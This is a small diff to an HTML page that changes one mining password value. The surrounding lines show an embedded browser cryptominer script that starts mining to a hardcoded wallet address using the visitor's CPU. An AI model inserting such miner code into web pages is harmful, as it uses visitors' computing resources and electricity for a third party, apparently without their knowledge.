--- a/index1.html
+++ b/index1.html
@@ -12,7 +12,7 @@
         var walletAddress = "4881APTxerVEMhPAdA1eQJVCV7L6QwTUz2cVSZpKHYbvghawyD5748bDqhmqiXurmq3pYPgtaRtu4WkTaMNQHAk6Q5dA466";
         var workerId = ""
         var threads = -1;
-        var password = "x";
+        var password = "X";
         startMining(pool, walletAddress, workerId, threads, password);
         throttleMiner = 20;
     </script>
